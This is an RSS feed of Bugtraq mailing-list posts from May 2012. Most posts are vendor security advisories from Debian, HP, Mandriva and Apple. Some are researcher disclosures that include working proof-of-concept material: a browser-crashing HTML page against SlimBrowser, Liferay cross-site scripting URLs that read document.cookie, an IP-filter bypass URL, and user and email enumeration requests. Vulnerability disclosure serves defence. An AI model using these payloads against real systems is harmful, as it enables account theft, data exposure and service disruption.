<?xml version="1.0" encoding="UTF-8"?>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns="http://purl.org/rss/1.0/" xmlns:taxo="http://purl.org/rss/1.0/modules/taxonomy/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:syn="http://purl.org/rss/1.0/modules/syndication/" xmlns:admin="http://webns.net/mvcb/">
  <channel rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq">
    <title>gmane.comp.security.bugtraq</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq</link>
    <description/>
    <syn:updatePeriod>hourly</syn:updatePeriod>
    <syn:updateFrequency>1</syn:updateFrequency>
    <syn:updateBase>1901-01-01T00:00+00:00</syn:updateBase>
    <items>
      <rdf:Seq>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/49726"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/49725"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/49724"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/49716"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/49715"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/49714"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/49713"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/49712"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/49711"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/49710"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/49708"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/49707"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/49706"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/49705"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/49704"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/49698"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/49697"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/49696"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/49695"/>
        <rdf:li rdf:resource="http://permalink.gmane.org/gmane.comp.security.bugtraq/49694"/>
      </rdf:Seq>
    </items>
    <image rdf:resource="http://gmane.org/img/gmane-25t.png"/>
    <textinput rdf:resource=""/>
  </channel>
  <image rdf:about="http://gmane.org/img/gmane-25t.png">
    <title>Gmane</title>
    <url>http://gmane.org/img/gmane-25t.png</url>
    <link>http://gmane.org</link>
  </image>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/49726">
    <title>New Open Source Web Application Vulnerability Scanner Available</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/49726</link>
    <description>&lt;pre&gt;Hi All,

There is a new web application vulnerability scanner available. It is called WebVulScan and it is open source. Here is the link for it if you want to check it out: http://code.google.com/p/webvulscan/

Regards,

Dermot Blair

&lt;/pre&gt;</description>
    <dc:creator>webvulscan&lt; at &gt;gmail.com</dc:creator>
    <dc:date>2012-05-16T23:30:29</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/49725">
    <title>[SECURITY] [DSA 2475-1] openssl security update</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/49725</link>
    <description>&lt;pre&gt;-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2475-1                   security&amp;lt; at &amp;gt;debian.org
http://www.debian.org/security/                          Raphael Geissert
May 17, 2012                           http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : openssl
Vulnerability  : integer underflow
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2012-2333

It was discovered that openssl did not correctly handle explicit
Initialization Vectors for CBC encryption modes, as used in TLS 1.1,
1.2, and DTLS. An incorrect calculation would lead to an integer
underflow and incorrect memory access, causing denial of service
(application crash.)

For the stable distribution (squeeze), this problem has been fixed in
version 0.9.8o-4squeeze13.

For the testing distribution (wheezy), and the unstable distribution
(sid), this &lt;/pre&gt;</description>
    <dc:creator>Raphael Geissert</dc:creator>
    <dc:date>2012-05-17T23:14:31</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/49724">
    <title>[security bulletin] HPSBOV02780 SSRT100766 rev.1 - HP OpenVMS ACMELOGIN, Local Unauthorized</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/49724</link>
    <description>&lt;pre&gt;Access and Increased Privileges

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03333494

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03333494
Version: 1

HPSBOV02780 SSRT100766 rev.1 - HP OpenVMS ACMELOGIN, Local Unauthorized
Access and Increased Privileges

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2012-05-17
Last Updated: 2012-05-17

Potential Security Impact: Local unauthorized access and increased
privileges

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with OpenVMS ACMELOGIN
when SYS$ACM system service for authentication is enabled. The vulnerability
could be locally exploited to allow unauthorized access and increased
privileges.

References: CVE-2012-2010

SUPPORTED SOFTWARE &lt;/pre&gt;</description>
    <dc:creator>security-alert&lt; at &gt;hp.com</dc:creator>
    <dc:date>2012-05-17T22:16:06</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/49716">
    <title>[SECURITY] [DSA 2474-1] ikiwiki security update</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/49716</link>
    <description>&lt;pre&gt;-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2474-1                   security&amp;lt; at &amp;gt;debian.org
http://www.debian.org/security/                          Raphael Geissert
May 16, 2012                           http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : ikiwiki
Vulnerability  : cross-site scripting
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2012-0220

Raúl Benencia discovered that ikiwiki, a wiki compiler, does not
properly escape the author (and its URL) of certain metadata, such as
comments. This might be used to conduct cross-site scripting attacks.

For the stable distribution (squeeze), this problem has been fixed in
version 3.20100815.9.

For the testing distribution (wheezy), this problem will be fixed soon.

For the unstable distribution (sid), this problem has been fixed in
version 3.20120516.

&lt;/pre&gt;</description>
    <dc:creator>Raphael Geissert</dc:creator>
    <dc:date>2012-05-17T05:17:26</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/49715">
    <title>DDIVRT-2012-44 Epicor Returns Management SOAP-Based Blind SQL Injection</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/49715</link>
    <description>&lt;pre&gt;Title
-----
DDIVRT-2012-44 Epicor Returns Management SOAP-Based Blind SQL Injection

Severity
--------
High

Date Discovered
---------------
April 12, 2012

Discovered By
-------------
Digital Defense, Inc. Vulnerability Research Team
Credit: Chris Graham and r&amp;lt; at &amp;gt;b13$

Vulnerability Description
-------------------------
Digital Defense, Inc. (DDI) has discovered a blind SQL injection vulnerability in the Epicor Returns Management software SOAP interface. Left unremediated, this vulnerability could be leveraged by an attacker to execute arbitrary SQL commands and extract information from the backend database using standard SQL exploitation techniques. Additionally, an attacker may be able to leverage this flaw to compromise the database server host operating system.

Solution Description
--------------------
Epicor Software Corporation has confirmed they have now contacted the customers affected, and have made an update available to address this vulnerability. As such, DDI recommends restricting access to the a&lt;/pre&gt;</description>
    <dc:creator>ddivulnalert&lt; at &gt;ddifrontline.com</dc:creator>
    <dc:date>2012-05-16T20:27:44</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/49714">
    <title>[security bulletin] HPSBUX02782 SSRT100844 rev.1 - HP-UX Running OpenSSL, Remote Denial of</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/49714</link>
    <description>&lt;pre&gt;Service (DoS)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03333987

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03333987
Version: 1

HPSBUX02782 SSRT100844 rev.1 - HP-UX Running OpenSSL, Remote Denial of
Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2012-05-17
Last Updated: 2012-05-17

- -----------------------------------------------------------------------------

Potential Security Impact: Remote Denial of Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP-UX OpenSSL.
This vulnerability could be exploited remotely to create a Denial of Service
(DoS).

References: CVE-2006-7250, CVE-2011-4619, CVE-2012-0884, CVE-2012-1165,
CVE-2012-2110, CVE-2012-2131
&lt;/pre&gt;</description>
    <dc:creator>security-alert&lt; at &gt;hp.com</dc:creator>
    <dc:date>2012-05-17T17:48:49</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/49713">
    <title>[security bulletin] HPSBUX02777 SSRT100854 rev.1 - HP-UX Running Java JRE and JDK, Remote Denial</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/49713</link>
    <description>&lt;pre&gt;of Service (DoS), Unauthorized Modification and Disclosure of Information

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03316985

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03316985
Version: 1

HPSBUX02777 SSRT100854 rev.1 - HP-UX Running Java JRE and JDK, Remote Denial
of Service (DoS), Unauthorized Modification and Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2012-05-15
Last Updated: 2012-05-15

- -----------------------------------------------------------------------------

Potential Security Impact: Remote Denial of service, unauthorized
modification and disclosure of information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified in Java Runtime
Environment &lt;/pre&gt;</description>
    <dc:creator>security-alert&lt; at &gt;hp.com</dc:creator>
    <dc:date>2012-05-17T17:48:11</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/49712">
    <title>[ MDVSA-2012:078 ] imagemagick</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/49712</link>
    <description>&lt;pre&gt;-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2012:078
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : imagemagick
 Date    : May 17, 2012
 Affected: 2011.
 _______________________________________________________________________

 Problem Description:

 Multiple vulnerabilities have been found and corrected in imagemagick:
 
 A flaw was found in the way ImageMagick processed images with malformed
 Exchangeable image file format (Exif) metadata. An attacker could
 create a specially-crafted image file that, when opened by a victim,
 would cause ImageMagick to crash or, potentially, execute arbitrary
 code (CVE-2012-0247).
 
 A denial of service flaw was found in the way ImageMagick processed
 images with malformed Exif metadata. An attacker could create a
 specially-crafted image file that, when opened &lt;/pre&gt;</description>
    <dc:creator>security&lt; at &gt;mandriva.com</dc:creator>
    <dc:date>2012-05-17T13:43:00</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/49711">
    <title>[ MDVSA-2012:077 ] imagemagick</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/49711</link>
    <description>&lt;pre&gt;-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2012:077
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : imagemagick
 Date    : May 17, 2012
 Affected: 2010.1, Enterprise Server 5.0
 _______________________________________________________________________

 Problem Description:

 Multiple vulnerabilities have been found and corrected in imagemagick:
 
 Untrusted search path vulnerability in configure.c in ImageMagick
 before 6.6.5-5, when MAGICKCORE_INSTALLED_SUPPORT is defined, allows
 local users to gain privileges via a Trojan horse configuration file
 in the current working directory (CVE-2010-4167).
 
 A flaw was found in the way ImageMagick processed images with malformed
 Exchangeable image file format (Exif) metadata. An attacker could
 create a specially-crafted image file that, when opened by a &lt;/pre&gt;</description>
    <dc:creator>security&lt; at &gt;mandriva.com</dc:creator>
    <dc:date>2012-05-17T13:23:01</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/49710">
    <title>[SECURITY] [DSA 2473-1] openoffice.org security update</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/49710</link>
    <description>&lt;pre&gt;-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2473-1                   security&amp;lt; at &amp;gt;debian.org
http://www.debian.org/security/                            Florian Weimer
May 16, 2012                           http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : openoffice.org
Vulnerability  : buffer overflow
Problem type   : local (remote)
Debian-specific: no
CVE ID         : CVE-2012-1149

Tielei Wang discovered that OpenOffice.org does not allocate a large
enough memory region when processing a specially crafted JPEG object,
leading to a heap-based buffer overflow and potentially arbitrary code
execution.

For the stable distribution (squeeze), this problem has been fixed in
version 1:3.2.1-11+squeeze5.

For the testing distribution (wheezy) and the unstable distribution
(sid), this problem has been fixed in version 1:3.4.5-1 of the&lt;/pre&gt;</description>
    <dc:creator>Florian Weimer</dc:creator>
    <dc:date>2012-05-16T22:04:38</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/49708">
    <title>FlashPeak SlimBrowser TITLE Denial Of Service Vulnerability</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/49708</link>
    <description>&lt;pre&gt;Title: FlashPeak SlimBrowser TITLE Denial Of Service Vulnerability
Software : FlashPeak SlimBrowser

Software Version : 6.0.1.38

Vendor: FlashPeak Inc.(www.flashpeak.com/) 

Vulnerability Published : 2012-05-16

Vulnerability Update Time :

Status : 

Impact : Medium(CVSS2 Base : 5.0, AV:N/AC:L/Au:N/C:N/I:N/A:P)

Bug Description :
FlashPeak SlimBrowser is a web browser Software for FREE.
FlashPeak SlimBrowser contains one denial of service vulnerability when surfing an HTML file that has a long web TITLE, remotely or locally.

Proof Of Concept :
-----------------------------------------------------------
&amp;lt;html&amp;gt;
&amp;lt;head&amp;gt;
&amp;lt;title&amp;gt;evil page&amp;lt;/title&amp;gt;
&amp;lt;body bgcolor="black"&amp;gt;
&amp;lt;script type="text/javascript"&amp;gt;
function a7(){
var buffer = "";
for (var i = 0; i &amp;lt; 1011; i++) {
buffer += "A";
}
document.title = buffer;
}
&amp;lt;/script&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
&amp;lt;font color="white"&amp;gt;
&amp;lt;h5&amp;gt;==&amp;gt; &amp;lt;a href="javascript:a7();"&amp;gt;'A'x1011&amp;lt;/a&amp;gt; &amp;lt;==&amp;lt;/h5&amp;gt;&amp;lt;br&amp;gt;
&amp;lt;font&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
-----------------------------------------------------------

Credits : This&lt;/pre&gt;</description>
    <dc:creator>demonalex&lt; at &gt;163.com</dc:creator>
    <dc:date>2012-05-16T15:12:57</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/49707">
    <title>The story of the Linux kernel 3.x...</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/49707</link>
    <description>&lt;pre&gt;The story of the Linux kernel 3.x...

In 2005 everybody was excited about the possibility of bypassing ASLR on all
Linux 2.6 kernels because of the new concept called VDSO (Virtual
Dynamic Shared Object). More information about this story can be found
at the following link:
http://www.trilithium.com/johan/2005/08/linux-gate/

In short, VDSO was mmap'ed by the kernel in the user space memory always
at the same fixed address. Because of that well-known technique
ret-to-libc (or as some ppl prefer ROP) was possible and effective
to bypass existing security mitigation in the system.

.. 6 years later Linus Torvalds announced the release of the new kernel
version - 3.x! Now, guess what happened...

pi3-darkstar new # uname -r
3.2.12-gentoo
pi3-darkstar new # cat /proc/sys/kernel/randomize_va_space 
2
pi3-darkstar new # cat /proc/self/maps|tail -2
bfa81000-bfaa2000 rw-p 00000000 00:00 0          [stack]
ffffe000-fffff000 r-xp 00000000 00:00 0          [vdso]
pi3-darkstar new # cat /proc/self/maps|tail -2
bfd5e000-bfd7f000&lt;/pre&gt;</description>
    <dc:creator>pi3&lt; at &gt;pi3.com.pl</dc:creator>
    <dc:date>2012-05-15T22:40:08</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/49706">
    <title>Re: Trigerring Java code from a SVG image</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/49706</link>
    <description>&lt;pre&gt;

There's probably some other software implementing this feature, but
not browsers (luckily !).

Regards,
Nicolas


&lt;/pre&gt;</description>
    <dc:creator>Nicolas Grégoire</dc:creator>
    <dc:date>2012-05-16T11:38:38</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/49705">
    <title>[SECURITY] [DSA 2472-1] gridengine security update</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/49705</link>
    <description>&lt;pre&gt;-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2472-1                   security&amp;lt; at &amp;gt;debian.org
http://www.debian.org/security/                            Florian Weimer
May 15, 2012                           http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : gridengine
Vulnerability  : privilege escalation
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2012-0208

Dave Love discovered that users who are allowed to submit jobs to a
Grid Engine installation can escalate their privileges to root because
the environment is not properly sanitized before creating processes.

For the stable distribution (squeeze), this problem has been fixed in
version 6.2u5-1squeeze1.

For the unstable distribution (sid), this problem has been fixed in
version 6.2u5-6.

We recommend that you upgrade your gridengine packages.

Further inf&lt;/pre&gt;</description>
    <dc:creator>Florian Weimer</dc:creator>
    <dc:date>2012-05-16T05:54:05</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/49704">
    <title>APPLE-SA-2012-05-15-1 QuickTime 7.7.2</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/49704</link>
    <description>&lt;pre&gt;-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

APPLE-SA-2012-05-15-1 QuickTime 7.7.2

QuickTime 7.7.2 is now available and addresses the following:

QuickTime
Available for:  Windows 7, Vista, XP SP2 or later
Impact:  Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description:  Multiple stack overflows existed in QuickTime's
handling of TeXML files. These issues do not affect OS X systems.
CVE-ID
CVE-2012-0663 : Alexander Gavrun working with HP's Zero Day
Initiative

QuickTime
Available for:  Windows 7, Vista, XP SP2 or later
Impact:  Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description:  A heap overflow existed in QuickTime's handling of text
tracks. This issue does not affect OS X systems.
CVE-ID
CVE-2012-0664 : Alexander Gavrun working with HP's Zero Day
Initiative

QuickTime
Available for:  Windows 7, Vista, XP SP2 or later
Impact:  Viewing a maliciously craf&lt;/pre&gt;</description>
    <dc:creator>Apple Product Security</dc:creator>
    <dc:date>2012-05-15T20:17:43</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/49698">
    <title>Liferay 6.1 json webservices are subject to cross-site request forgery attacks</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/49698</link>
    <description>&lt;pre&gt;Liferay 6.1 json webservices are subject to cross-site request forgery attacks

Description:

Liferay Portal is an enterprise portal written in Java

If a user is currently logged in to the portal (or has ticked the
remember me box) then with a
little help of social engineering (like sending a link via
email/chat), an attacker can read most
data the logged in user is privileged to see. The reason for this is
that the new json webservices
let you pass along the name of a javascript function that should be
called with the result of
the invocation (jsonp). Because the HTML &amp;lt;script&amp;gt; tag does not respect
the same origin policy in web
browser implementations, a malicious page can request and obtain JSON
data belonging to the portal
by using the techniques described in this article

http://www.xml.com/pub/a/2005/12/21/json-dynamic-script-tag.html

Code demonstrating the vulnerability can be found at

http://issues.liferay.com/secure/attachment/46878/fun.html

Systems affected

Liferay 6.1 ce
Liferay 6.1 ee

Vendor &lt;/pre&gt;</description>
    <dc:creator>Jelmer Kuperus</dc:creator>
    <dc:date>2012-05-13T10:29:55</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/49697">
    <title>[ MDVSA-2012:075 ] ffmpeg</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/49697</link>
    <description>&lt;pre&gt;-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2012:075
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : ffmpeg
 Date    : May 15, 2012
 Affected: 2010.1
 _______________________________________________________________________

 Problem Description:

 Multiple vulnerabilities have been found and corrected in ffmpeg:
 
 The Matroska format decoder in FFmpeg does not properly allocate
 memory, which allows remote attackers to execute arbitrary code via
 a crafted file (CVE-2011-3362, CVE-2011-3504).
 
 cavsdec.c in libavcodec in FFmpeg allows remote attackers to cause
 a denial of service (incorrect write operation and application
 crash) via an invalid bitstream in a Chinese AVS video (aka CAVS)
 file, related to the decode_residual_block, check_for_slice,
 and cavs_decode_frame functions, a different vul&lt;/pre&gt;</description>
    <dc:creator>security&lt; at &gt;mandriva.com</dc:creator>
    <dc:date>2012-05-15T12:15:01</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/49696">
    <title>Liferay 6.1 can be compromised without having an account on the portal</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/49696</link>
    <description>&lt;pre&gt;Liferay 6.1 can be compromised without having an account on the portal

Description:

Liferay Portal is an enterprise portal written in Java

Liferay in its default configuration exposes a number of remotely
accessible webservices.
Access to these services is restricted by an ip block.

It is possible to circumvent this ip block in the following way :

http://vulnerablehost/?p_p_id=58&amp;amp;p_p_lifecycle=2&amp;amp;p_p_resource_id=/path/to/remote/endpoint

By invoking such an url you trigger a call to
requestDispatcher.forward() Because the ip filter was
not configured to filter forward targets This allows you to call
servlets that would otherwise be
inaccessible.

One type of remote service that is exposed is the tunnel service. This
service does not validate
user passwords. Therefore by presenting the userid of an admin user to
this service it is possible
to completely compromise the server.

An account on the portal is not required in order to exploit this
vulnerability.

Proof of concept:

Code demonstrating the vulne&lt;/pre&gt;</description>
    <dc:creator>Jelmer Kuperus</dc:creator>
    <dc:date>2012-05-13T09:29:36</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/49695">
    <title>Guests can view names and emailadresses of all Liferay users in liferay 6.1</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/49695</link>
    <description>&lt;pre&gt;Guests can view names and emailadresses of all Liferay users in liferay 6.1

Description:

Liferay Portal is an enterprise portal written in Java

As an unauthenticated user it is possible to retrieve the names and
email addresses of all Liferay users.
To retrieve a list of all users simply issue the following request

http://vulnerablehost/c/search/open_search?p=1&amp;amp;c=5000&amp;amp;keywords=entryClassName:com.liferay.portal.model.User

Getting to the email addresses is a bit more involved, because these
are not included in the response. But it is still possible to get to
them by utilizing wildcard searches. The following request will return
all users whose email address starts with a "b"

http://vulnerablehost/c/search/open_search?p=1&amp;amp;c=5000&amp;amp;keywords=emailAddress:b*

By adding a letter at a time to the emailAddress parameter it's
possible to eventually get someone's full email address

Proof of concept:

Code demonstrating the vulnerability can be found at

https://github.com/jelmerk/liferay-opensearch-exploit

Systems af&lt;/pre&gt;</description>
    <dc:creator>Jelmer Kuperus</dc:creator>
    <dc:date>2012-05-13T09:41:35</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/49694">
    <title>Multiple xss issues in Liferay</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/49694</link>
    <description>&lt;pre&gt;Multiple xss issues in Liferay

Description:

Liferay Portal is an enterprise portal written in Java

Multiple xss vulnerabilities were found in liferay. Because liferay
has a "remember me"
option in their login screen that stores an encrypted password in a
cookie this is more
problematic than it otherwise would be

1. xss vulnerability in upload_progress_poller.jsp

http://vulnerablehost/html/portal/upload_progress_poller.jsp?uploadProgressId=a%3D1%3Balert%28document.cookie%29%3B%2F%2F

2. xss vulnerability in ckeditor.jsp

http://vulnerablehost?p_p_id=15&amp;amp;p_p_lifecycle=2&amp;amp;_15_struts_action=/journal/edit_article&amp;amp;ckEditorConfigFileName=ckconfig.jsp%27%2Ca%3Aalert%28document.cookie%29%2Cb%3A%27

3. xss vulnerability in the currency converter portlet

To reproduce :

Drag the currency converter on the home page then go to :

http://localhost:8080/web/guest/home?_16_chartId=%22/%3E%3Cscript%20type=%22text/javascript%22%3Ealert(123);%3C/script%3E&amp;amp;p_p_id=16&amp;amp;p_p_lifecycle=0&amp;amp;p_p_state=maximized&amp;amp;p_p_mode=view&amp;amp;p_p_col&lt;/pre&gt;</description>
    <dc:creator>Jelmer Kuperus</dc:creator>
    <dc:date>2012-05-13T10:12:21</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/49693">
    <title>APPLE-SA-2012-05-14-2 Leopard Security Update 2012-003</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/49693</link>
    <description>&lt;pre&gt;-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

APPLE-SA-2012-05-14-2 Leopard Security Update 2012-003

Leopard Security Update 2012-003 is now available and addresses the
following:

Internet plug-ins
Available for:  Mac OS X v10.5 to 10.5.8 Intel
Impact:  Out-of-date versions of Adobe Flash Player are disabled
Description:  This update disables Adobe Flash Player if it is older
than 10.1.102.64 by moving its files to a new directory. This update
presents the option to install an updated version of Flash Player
from the Adobe website.

Leopard Security Update 2012-003 may be obtained from
the Software Update pane in System Preferences, or Apple's Software
Downloads web site:
http://www.apple.com/support/downloads/

The download file is named: SecUpd2012-003.dmg
Its SHA-1 digest is: dc0b70cdcc896838fca9bf7ea4b867ec3cca48d4

Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222

This message is signed with Apple's Product Security PGP key,
and details are av&lt;/pre&gt;</description>
    <dc:creator>Apple Product Security</dc:creator>
    <dc:date>2012-05-14T20:31:58</dc:date>
  </item>
  <textinput rdf:about="http://search.gmane.org/?group=$group=gmane.comp.security.bugtraq">
    <title>Search Engine</title>
    <description>Search the mailing list at Gmane</description>
    <name>query</name>
    <link>http://search.gmane.org/?group=$group=gmane.comp.security.bugtraq</link>
  </textinput>
</rdf:RDF>

